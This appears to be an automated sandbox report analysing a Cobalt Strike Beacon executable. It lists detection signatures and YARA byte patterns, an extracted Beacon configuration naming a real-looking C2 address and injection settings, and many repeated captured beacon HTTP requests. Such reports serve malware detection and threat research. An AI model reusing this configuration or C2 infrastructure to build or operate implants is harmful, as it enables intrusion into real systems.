Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
beacon_x86.exe

Overview

General Information

Sample name:beacon_x86.exe
Analysis ID:1587368
MD5:bffe5dbe4d4ececc6652360ce37b8075
SHA1:9e3ccfe33a88fd70ba6b5ac8f72b3bc0c760e798
SHA256:c86426eeb24a042903b302c21513defb1e61535fc008b7c9e847113ddb798666
Tags:CobaltStrikeexeuser-lontze7
Infos:

Detection

CobaltStrike
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected CobaltStrike
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found potential dummy code loops (likely to delay analysis)
Machine Learning detection for sample
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Program does not show much activity (idle)
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • beacon_x86.exe (PID: 7776 cmdline: "C:\Users\user\Desktop\beacon_x86.exe" MD5: BFFE5DBE4D4ECECC6652360CE37B8075)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Cobalt Strike, CobaltStrikeCobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to command execution, key logging, file transfer, SOCKS proxying, privilege escalation, mimikatz, port scanning and lateral movement. Beacon is in-memory/file-less, in that it consists of stageless or multi-stage shellcode that once loaded by exploiting a vulnerability or executing a shellcode loader, will reflectively load itself into the memory of a process without touching the disk. It supports C2 and staging over HTTP, HTTPS, DNS, SMB named pipes as well as forward and reverse TCP; Beacons can be daisy-chained. Cobalt Strike comes with a toolkit for developing shellcode loaders, called Artifact Kit.The Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable.
  • APT 29
  • APT32
  • APT41
  • AQUATIC PANDA
  • Anunak
  • Cobalt
  • Codoso
  • CopyKittens
  • DarkHydrus
  • Earth Baxia
  • FIN6
  • FIN7
  • Leviathan
  • Mustang Panda
  • Shell Crew
  • Stone Panda
  • TianWu
  • UNC1878
  • UNC2452
  • Winnti Umbrella
https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike
{"BeaconType": ["HTTP"], "Port": 80, "SleepTime": 15024, "MaxGetSize": 3341464, "Jitter": 45, "C2Server": "8.148.6.140,/api/v1/get", "HttpPostUri": "/api/v1/post", "Malleable_C2_Instructions": ["Base64 decode"], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%allusersprofile%\\CrashReport\\CrashReport.exe", "Spawnto_x64": "%allusersprofile%\\CrashReport\\CrashReport64.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 666666666, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 10192, "ProcInject_PrependAppend_x86": ["Dx+EAAAAAAAPHwAPH0QAAJAPH4QAAAAAAA==", "Dx9EAAAPH0QAAA8fAA8fgAAAAABmDx9EAABmDx+EAAAAAAAPH0AADx9AAA8fQAA="], "ProcInject_PrependAppend_x64": ["kA8fQAAPH4QAAAAAAGYPH0QAAA8fQAAPH4QAAAAAAJBmDx+EAAAAAAAPH0QAAJAPHwAPH4AAAAAADx9AAA8fQABQWGaQZg8fhAAAAAAAZg8fhAAAAAAADx8A", "Dx+AAAAAAA8fhAAAAAAADx9EAABmDx9EAACQDx9EAAAPH4AAAAAAUFgPH4AAAAAADx8ADx+AAAAAAA8fgAAAAAAPH0AADx8AZg8fRAAADx9EAAAPH4QAAAAAAA8fQACQkA=="], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "CreateThread", "NtQueueApcThread-s", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}
SourceRuleDescriptionAuthorStrings
beacon_x86.exeJoeSecurity_CobaltStrike_4Yara detected CobaltStrikeJoe Security
    SourceRuleDescriptionAuthorStrings
    00000001.00000002.3882200345.0000000000D97000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_7bc0f998Identifies the API address lookup function leverage by metasploit shellcodeunknown
    • 0x8f:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
    00000001.00000002.3882200345.0000000000D97000.00000004.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
    • 0xfb:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
    00000001.00000003.1419965781.0000000000810000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_CobaltStrike_f0b627fcRule for beacon reflective loaderunknown
    • 0x9d60:$beacon_loader_x86_2: 81 E1 FF FF FF 00 81 F9 41 41 41 00 75 1D 8B 55 D8 81 E2 FF FF FF 00 81 FA 42 42 42 00 75
    • 0xaa30:$beacon_loader_x86_2: 81 E1 FF FF FF 00 81 F9 41 41 41 00 75 1D 8B 55 D8 81 E2 FF FF FF 00 81 FA 42 42 42 00 75
    00000001.00000003.1419965781.0000000000810000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_7bc0f998Identifies the API address lookup function leverage by metasploit shellcodeunknown
    • 0x364cd:$a1: 48 31 D2 65 48 8B 52 60 48 8B 52 18 48 8B 52 20 48 8B 72 50 48 0F B7 4A 4A 4D 31 C9 48 31 C0 AC 3C 61
    00000001.00000003.1419965781.0000000000810000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_Metasploit_c9773203Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families.unknown
    • 0x36539:$a: 48 31 C0 AC 41 C1 C9 0D 41 01 C1 38 E0 75 F1 4C 03 4C 24 08 45 39 D1
    Click to see the 1 entries
    SourceRuleDescriptionAuthorStrings
    1.0.beacon_x86.exe.400000.0.unpackJoeSecurity_CobaltStrike_4Yara detected CobaltStrikeJoe Security
      1.2.beacon_x86.exe.400000.0.unpackJoeSecurity_CobaltStrike_4Yara detected CobaltStrikeJoe Security
        No Sigma rule has matched
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: beacon_x86.exeAvira: detected
        Source: 00000001.00000003.1419965781.0000000000810000.00000020.00001000.00020000.00000000.sdmpMalware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTP"], "Port": 80, "SleepTime": 15024, "MaxGetSize": 3341464, "Jitter": 45, "C2Server": "8.148.6.140,/api/v1/get", "HttpPostUri": "/api/v1/post", "Malleable_C2_Instructions": ["Base64 decode"], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%allusersprofile%\\CrashReport\\CrashReport.exe", "Spawnto_x64": "%allusersprofile%\\CrashReport\\CrashReport64.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 666666666, "bStageCleanup": "True", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "False", "bProcInject_UseRWX": "False", "bProcInject_MinAllocSize": 10192, "ProcInject_PrependAppend_x86": ["Dx+EAAAAAAAPHwAPH0QAAJAPH4QAAAAAAA==", "Dx9EAAAPH0QAAA8fAA8fgAAAAABmDx9EAABmDx+EAAAAAAAPH0AADx9AAA8fQAA="], "ProcInject_PrependAppend_x64": ["kA8fQAAPH4QAAAAAAGYPH0QAAA8fQAAPH4QAAAAAAJBmDx+EAAAAAAAPH0QAAJAPHwAPH4AAAAAADx9AAA8fQABQWGaQZg8fhAAAAAAAZg8fhAAAAAAADx8A", "Dx+AAAAAAA8fhAAAAAAADx9EAABmDx9EAACQDx9EAAAPH4AAAAAAUFgPH4AAAAAADx8ADx+AAAAAAA8fgAAAAAAPH0AADx8AZg8fRAAADx9EAAAPH4QAAAAAAA8fQACQkA=="], "ProcInject_Execute": ["ntdll:RtlUserThreadStart", "CreateThread", "NtQueueApcThread-s", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}
        Source: beacon_x86.exeReversingLabs: Detection: 94%
        Source: beacon_x86.exeVirustotal: Detection: 79%Perma Link
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: beacon_x86.exeJoe Sandbox ML: detected
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D6DF82 CryptGenRandom,CryptReleaseContext,1_2_00D6DF82
        Source: beacon_x86.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D64225 _malloc,_memset,_strncmp,GetCurrentDirectoryA,FindFirstFileA,GetLastError,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,1_2_00D64225
        Source: C:\Users\user\Desktop\beacon_x86.exeCode function: 1_2_00D6970E _malloc,__snprintf,FindFirstFileA,_malloc,__snprintf,FindNextFileA,FindClose,1_2_00D6970E

        Networking

        barindex
        Source: Malware configuration extractorURLs: 8.148.6.140
        Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /api/v1/get HTTP/1.1Content-Type: text/plainAccept: */*Accept-Language: zh-CN,zh;q=0.9,en;q=0.8Accept-Encoding: gzip, deflatePriority: u=1, iCookie: _UK=hWt/0nePrtcIQYnG7vduAx/6zKZ2w9/mzQclTlCKpJAYihwcwRUkuSQWBKC9EvDZ3zjfXdH+u2t7nonAxYifjtYA1PAO4/qsy1zaKIdigXM8kn5hMnE6FPv8IIWIHp178g0rL30ToEZG+NeDvGNMnbTLhfwvrNySAbfiF5mX1Ck=User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36Host: 8.148.6.140Connection: Keep-AliveCache-Control: no-cache
